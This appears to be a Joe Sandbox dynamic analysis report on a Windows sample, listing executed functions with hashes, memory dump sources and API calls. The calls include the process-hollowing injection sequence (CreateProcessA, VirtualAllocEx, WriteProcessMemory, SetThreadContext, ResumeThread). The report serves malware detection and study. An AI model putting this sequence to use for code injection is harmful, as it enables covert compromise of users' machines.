MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.3%
Total number of Nodes:	301
Total number of Limit Nodes:	17

Executed Functions

Function 03351178 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb69c60b0f6c9e4641eafc8917bf4354114f65d4b592ce477db32b7c7975e191
Instruction ID: e2b0fae6764be1a7d3364a50675ad37d15332d356706379eeea9fcbd446c54be
Opcode Fuzzy Hash: cb69c60b0f6c9e4641eafc8917bf4354114f65d4b592ce477db32b7c7975e191
Instruction Fuzzy Hash: AD918335E0031ACFCB05DFB4D8949DEFBBAFF99310B148615E819AB264DB30A985CB51

Function 03351FF1 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5f7f0c144f226a1c0b9bd7e01df2409cf62edc61daf35a396ae164f84324d9
Instruction ID: 59bfffab2b0bd51b6ef0a3648f6e37d5cc63bd08f9139af5e4cee54b341b091e
Opcode Fuzzy Hash: bb5f7f0c144f226a1c0b9bd7e01df2409cf62edc61daf35a396ae164f84324d9
Instruction Fuzzy Hash: EB915035E0031ADFCB05DFB0D8849DEFBBAFF99310B188615E815AB265DB30A985CB51

Function 03355A58 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55b7991f48b217017060ffc9c4fc6d04df15d647c525db95909b1257ed8117c
Instruction ID: af211c411daecb95bd8d56a33993d6573f4f73f3c218e15c424e9ac8d6274998
Opcode Fuzzy Hash: f55b7991f48b217017060ffc9c4fc6d04df15d647c525db95909b1257ed8117c
Instruction Fuzzy Hash: 86613C34E1034A8FDB05DFA5C994DDDFBB6BF9A300B194169E806AF264EB30AD45CB50

Function 079C1921 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4092295972ac61dda8787ac396ca93d89c9336cca595d870b0d066f7fe447eed
Instruction ID: cc75c39fb82d200e4f9124c7067b0da8e762a86d21b247469a9c6b06d3437cfe
Opcode Fuzzy Hash: 4092295972ac61dda8787ac396ca93d89c9336cca595d870b0d066f7fe447eed
Instruction Fuzzy Hash: 8521F8B1D146188BEB19CFA6C9053EEBFB6AF89304F14C06AD408AB255DB750945CF91

Function 079C1930 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813446371793e79086d263950caa16bc3e7061158a4506f521386a26d2d3415d
Instruction ID: fd11599d4c8c02380cfc6cdfff33dcbe3f3246c4cc2bdf0ffa4d18922b70c3b7
Opcode Fuzzy Hash: 813446371793e79086d263950caa16bc3e7061158a4506f521386a26d2d3415d
Instruction Fuzzy Hash: 2C21C3B0D146188BEB18CFABC9453EEFAF6BFC9304F14C06AD40966264DBB519458F94

Function 079C8B9A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114802f40950d877aa81c9174b8aaff0a296f7487301dd1e03263e237fa03645
Instruction ID: f7d5f186503f195b2375e96cee14596b9183dd4fa10b856307fb2823e3160f9f
Opcode Fuzzy Hash: 114802f40950d877aa81c9174b8aaff0a296f7487301dd1e03263e237fa03645
Instruction Fuzzy Hash: 8D01EFB4809229CFCB21CF14DC54BE9BBB9AB4A319F0094D9E40DA7252C376AE85CF01

Function 0147D371 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0147D3FE
GetCurrentThread.KERNEL32 ref: 0147D43B
GetCurrentProcess.KERNEL32 ref: 0147D478
GetCurrentThreadId.KERNEL32 ref: 0147D4D1

Strings

4']q, xrefs: 0147D349

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4']q
API String ID: 2063062207-1259897404
Opcode ID: 43a708a40630e30b0949c979fa71ba0dd9977258b406d33ab6afe2c7b9233937
Instruction ID: ca73d3ab26125b288d00aab08b5a8c8f84b182bd53285c71d75b6842575200e7
Opcode Fuzzy Hash: 43a708a40630e30b0949c979fa71ba0dd9977258b406d33ab6afe2c7b9233937
Instruction Fuzzy Hash: 8E6159B09102498FDB18DFA9D548BEEBFF5FF48314F208469D109A7360D734A944CB65

Function 0147D380 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0147D3FE
GetCurrentThread.KERNEL32 ref: 0147D43B
GetCurrentProcess.KERNEL32 ref: 0147D478
GetCurrentThreadId.KERNEL32 ref: 0147D4D1

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c2a94cd5e649ae8a8763eec6d8ce33f930180b0dd6978f9a45c29858d40be421
Instruction ID: d0308781a93eb2652e50ea81e300d7c0c5ecf130f535e9d9d81454a41adb2856
Opcode Fuzzy Hash: c2a94cd5e649ae8a8763eec6d8ce33f930180b0dd6978f9a45c29858d40be421
Instruction Fuzzy Hash: 265125B09102498FDB18DFAAD548BEEBBF5FF48314F208469E509A7360D734A984CB65

Function 079C72B4 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079C74F6

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d4b81d13076a0e3439dbe3e01c77b56114648090ac50932b5d2dff2b12eb2011
Instruction ID: 998a3cf10d59d18d361f7983dc467cbec0ce1a03a2e84a8356ec9d89dc476796
Opcode Fuzzy Hash: d4b81d13076a0e3439dbe3e01c77b56114648090ac50932b5d2dff2b12eb2011
Instruction Fuzzy Hash: FFA170B1D0021ACFDF24CFA9C840BEDBBB6BF48314F14856AD818A7240DB749985CF92

Function 079C72C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079C74F6

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1ae81413e9eac0462d6d26b4d2a96cee28c267934cdc3b043d5a4880178b6786
Instruction ID: 55e15329e7fbce3bfedd23ae33ddf837354ef7d502ceb120df52154a20999f1a
Opcode Fuzzy Hash: 1ae81413e9eac0462d6d26b4d2a96cee28c267934cdc3b043d5a4880178b6786
Instruction Fuzzy Hash: D99160B1D0021ADFDF24CFA9C840BEDBBB6BF48314F14856AD819A7250DB749985CF92

Function 0147B0E8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0147B33E

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 938d10d368c58354d1965d77263876677fa86c2e165b7b73971ff27947b79574
Instruction ID: 3aa0e83a3614c44c3b7857c302a04bb1f9e118908c47f43e2610f6b2147fdc4f
Opcode Fuzzy Hash: 938d10d368c58354d1965d77263876677fa86c2e165b7b73971ff27947b79574
Instruction Fuzzy Hash: A5711370A00B058FD724DF6AE44479ABBF2FF88204F14892ED44A97B50DB74E84ACB91

Function 03351C91 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03351E02

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 701ee93ee87ef5f987223174ac2ec4afb7a0ace54c0e746ccf7990f808358a31
Instruction ID: 46f9b0f831f6db81c052491bb8cbb37f21def6c77bc097ce6cc237bbf1482d14
Opcode Fuzzy Hash: 701ee93ee87ef5f987223174ac2ec4afb7a0ace54c0e746ccf7990f808358a31
Instruction Fuzzy Hash: C651EFB1C00249EFCF15CF99C984ADDBFB6BF49300F24816AE808AB221D775A955CF90

Function 03351CF0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03351E02

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 06a0213205510c067cccb84c3e10ccb942e88ec01485b93a4229cd03ddccfed0
Instruction ID: ac63ebc02f45153bcf9bd8367f281e12fd45038a52f87ec7788fe828a833e812
Opcode Fuzzy Hash: 06a0213205510c067cccb84c3e10ccb942e88ec01485b93a4229cd03ddccfed0
Instruction Fuzzy Hash: B041AEB1D103499FDF14CF9AD884ADEFBB5BF48310F64812AE819AB210D775A885CF90

Function 0147590C Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014759C9

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 94a11d010e6349fe7651d3e4a938a529ba2931976ba9a974073d1ddd4883a132
Instruction ID: 46cbf03b69ac8fe9f75d5ac64898dd1a15a8e2f2d15c641b8c7287d4f9eea777
Opcode Fuzzy Hash: 94a11d010e6349fe7651d3e4a938a529ba2931976ba9a974073d1ddd4883a132
Instruction Fuzzy Hash: B54124B0C00719CFDB24DFA9C884BDEBBB1BF49304F20806AD418AB264CB75694ACF51

Function 03351284 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 03354381

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e7c8a15a931320332621120f27e179878cc3c23202bd2ebd199d74a1051761ef
Instruction ID: 80ef5615ea24e8a3a07ed310e64a890822eb93e3e4e68fc6b72077171eab86fa
Opcode Fuzzy Hash: e7c8a15a931320332621120f27e179878cc3c23202bd2ebd199d74a1051761ef
Instruction Fuzzy Hash: 164109B59102058FCB14DF9AC488EAAFBF5FF99314F24C459E919A7321D374A881CBA0

Function 01474514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 014759C9

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 432bd9aff3f32b0486ece96f98ff8d17dcd0949d5949a568f60b6914380a378e
Instruction ID: 8b6699c61dee3e91d56ac76b7d11cfb61c2210828c7484017e47468dc01a4923
Opcode Fuzzy Hash: 432bd9aff3f32b0486ece96f98ff8d17dcd0949d5949a568f60b6914380a378e
Instruction Fuzzy Hash: 2741C1B0C00719CFDB24DFA9C944ADEBBB5BF49304F20806AD418AB265DB75594ACF91

Function 079C7030 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079C70C8

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bbee18ee80127fe1989e4cb941623db69b59f289483659b296d44380c31e7a3f
Instruction ID: 430ed3ac1ab7c6944b4d1afcf9f365fc20d90c029a81a263dc36504ef1941cdb
Opcode Fuzzy Hash: bbee18ee80127fe1989e4cb941623db69b59f289483659b296d44380c31e7a3f
Instruction Fuzzy Hash: 662148B59003499FDB10DFAAC841BEEBBF5FF48314F10842AE919A7240D7799940CFA1

Function 079C7038 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079C70C8

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: da3590358b941bba6fefb5edc9a906cc49631486c9f8d82b1a7141412798fb91
Instruction ID: 6696b5e8349bda713547bb70d05437b2fc84ed40b37b34a184557aaf2338907f
Opcode Fuzzy Hash: da3590358b941bba6fefb5edc9a906cc49631486c9f8d82b1a7141412798fb91
Instruction Fuzzy Hash: F92126B19003199FDB10DFAAC885BEEBBF5FF48314F10842AE919A7240D7789944CBA1

Function 079C6E98 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079C6F1E

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 87acea131bbb0967b2e3f8710ab9d49e8d33b2d1af53222f2f13e9df79d28506
Instruction ID: bd0a4a0c3ac7d152266504abd842b74b3a66550bd9413046b8be35a2ec30b8df
Opcode Fuzzy Hash: 87acea131bbb0967b2e3f8710ab9d49e8d33b2d1af53222f2f13e9df79d28506
Instruction Fuzzy Hash: C82148B29003098FDB10DFAAC4857EEBBF4EF48314F10842AD459A7240CB789985CFA5

Function 079C7120 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079C71A8

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 51e35d7e9ddaaf796de38a0fe962ec87594aa3d49c2a585d9f89ae01e3ad2843
Instruction ID: 8e8ddcc37a685c3322e8d9de9223df0c3fb907974e27367b4b4bcb6eca81a14e
Opcode Fuzzy Hash: 51e35d7e9ddaaf796de38a0fe962ec87594aa3d49c2a585d9f89ae01e3ad2843
Instruction Fuzzy Hash: 47212AB18002599FCF10DFAAD844AEEBBF5FF48314F50842EE919A7250D7389545CFA5

Function 0147D5C1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D64F

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 875f30e979ea08efbe2c95f05c0adb44b20a8994f4296f286ccbf31e1cb123d0
Instruction ID: 9c17f918312faf5327df7b804f52c894f0071632ee280105a859049ff1bd2d99
Opcode Fuzzy Hash: 875f30e979ea08efbe2c95f05c0adb44b20a8994f4296f286ccbf31e1cb123d0
Instruction Fuzzy Hash: 5621E3B5D002199FDB10CFAAD984AEEBBF5FF48310F14841AE918A3350C379A940CFA4

Function 079C6EA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079C6F1E

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1196602a4d417ba09fbe135d9e2ac6e57e57e83fca10cc70376966363b778e19
Instruction ID: d439331af43b55d73d59d1777e4593951be34a56c510ae036d27bdd1fb84e950
Opcode Fuzzy Hash: 1196602a4d417ba09fbe135d9e2ac6e57e57e83fca10cc70376966363b778e19
Instruction Fuzzy Hash: 0B2115B19003098FDB10DFAAC4857EEBBF8EF48314F54842ED559A7240CB78A985CFA5

Function 079C7128 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079C71A8

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1d29f1b99972d73b0e236d1c2dff44879d03381e567e42af01ba634b5afd5196
Instruction ID: 84a0fba5c67dacd8423cb3687fc9d79272a064b49e7646a45f536d3d5dc9d3a9
Opcode Fuzzy Hash: 1d29f1b99972d73b0e236d1c2dff44879d03381e567e42af01ba634b5afd5196
Instruction Fuzzy Hash: 7F2125B18003599FCB10DFAAC884AEEFBF5FF48310F50842AE919A7240C7389945CBA1

Function 0147D5C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D64F

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5ffe3d446a8fce260b49fd688104ee2ba34fc0a52c7b0d20a8493b8ab8c04edb
Instruction ID: 2c963a8d201c8106712437d60446de62ddc9c043ea0bba4789613f0811933694
Opcode Fuzzy Hash: 5ffe3d446a8fce260b49fd688104ee2ba34fc0a52c7b0d20a8493b8ab8c04edb
Instruction Fuzzy Hash: F721B0B59002489FDB10CFAAD984ADEBBF9EB48310F14841AE918A3350D378A954CFA5

Function 079C6F71 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079C6FE6

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9344a7fda0e98b22a4e4ee90e24a63cd0d0ed09dd45a0ffd5aad36a30ea34ef
Instruction ID: be65ffaa9dcfc616926e31488eb2bff3622385ee47de2a043fa0f28989421a53
Opcode Fuzzy Hash: a9344a7fda0e98b22a4e4ee90e24a63cd0d0ed09dd45a0ffd5aad36a30ea34ef
Instruction Fuzzy Hash: 87113AB58002499FCB10DFAAD845BDFBFF9EF88314F148419E519A7250CB79A540CFA1

Function 079C6F78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079C6FE6

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7f4d36195d446403b28f32a94ccd48bc05b4d6e73df3d7edf8442cf59ec42870
Instruction ID: 525bcef06a954d193e43780fff33feba88110571b4b421b782cd1a2959ea4ae5
Opcode Fuzzy Hash: 7f4d36195d446403b28f32a94ccd48bc05b4d6e73df3d7edf8442cf59ec42870
Instruction Fuzzy Hash: 1E1137B18002499FCB10DFAAC845AEFBFF9EF48314F208419E519A7250CB79A940CFA1

Function 079C6DF0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 079C6E52

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9d5d434e1ddedcff92f451d7f55717e429fd6c66de1646dcd3a56e469c86c325
Instruction ID: 8be2ed33460620c060a880b80374ef69a826b888c8206063d40b2ab8bbe73bd3
Opcode Fuzzy Hash: 9d5d434e1ddedcff92f451d7f55717e429fd6c66de1646dcd3a56e469c86c325
Instruction Fuzzy Hash: 681128B19003498BCB20DFAAC4457AEFBF5EF88314F20841AD519A7240CB79A944CBA5

Function 079C6DE8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 079C6E52

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 18950e151e6a54ebf77c274bc11f5c94ef0209c9b701f2a46b0d1c4b2b897fc9
Instruction ID: e0e0d83963ab6f899291f2889bb68edfe2ec496708edf058db18b1c9d4d7a6fb
Opcode Fuzzy Hash: 18950e151e6a54ebf77c274bc11f5c94ef0209c9b701f2a46b0d1c4b2b897fc9
Instruction Fuzzy Hash: 781134B1A043898EDB10DFA9C4447AEFFF1AF45318F24885EC159A7241CB799945CBA1

Function 079C5CF8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 079C9A1D

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a7f293ad52175cb9aa294957a9ec8d7f873d5e732ad260f378557f52f922c857
Instruction ID: 48bc8618120ba397c8bd41a0f34794dbc614582cd1791ba098d36537709260d3
Opcode Fuzzy Hash: a7f293ad52175cb9aa294957a9ec8d7f873d5e732ad260f378557f52f922c857
Instruction Fuzzy Hash: F111F5B5800349DFCB10DF9AD444BDEBBF8EB48324F148459E559A7600C375A944CFA5

Function 0147B2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0147B33E

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 59a7941303197d81c27bea9d509b813bd8a3708030fbf40f0639d0798cad8427
Instruction ID: f40022685d8b73cbc03b4ab4b89dc133468738800b79aca8e0076509c0d688d7
Opcode Fuzzy Hash: 59a7941303197d81c27bea9d509b813bd8a3708030fbf40f0639d0798cad8427
Instruction Fuzzy Hash: 3211E0B6C002498FDB14DF9AD444ADEFBF4EF88314F14845AD919A7310C379A585CFA5

Function 079C99B8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 079C9A1D

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ca085e084df1d5b58461d30c95577cfd3491bed409c3ed69d86012f35060c7b1
Instruction ID: 11e6378b71ecc603ca429aa99adff6bae3b2879ffc8e3628ae465784dfabe9e4
Opcode Fuzzy Hash: ca085e084df1d5b58461d30c95577cfd3491bed409c3ed69d86012f35060c7b1
Instruction Fuzzy Hash: 4511F2B5800249DFDB10DF9AD484BDEBBF8FB48324F20845AE558A7640C379A984CFA5

Function 013CD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058346328.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13cd000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13978e97ed4321b49b9e03dd332149abf38a4d932c028a8ae70f8ba4c7225237
Instruction ID: 4110e2362606ceb6db92bcc4f11c8c021a2b905d956e15fe6f9c769f54e0c438
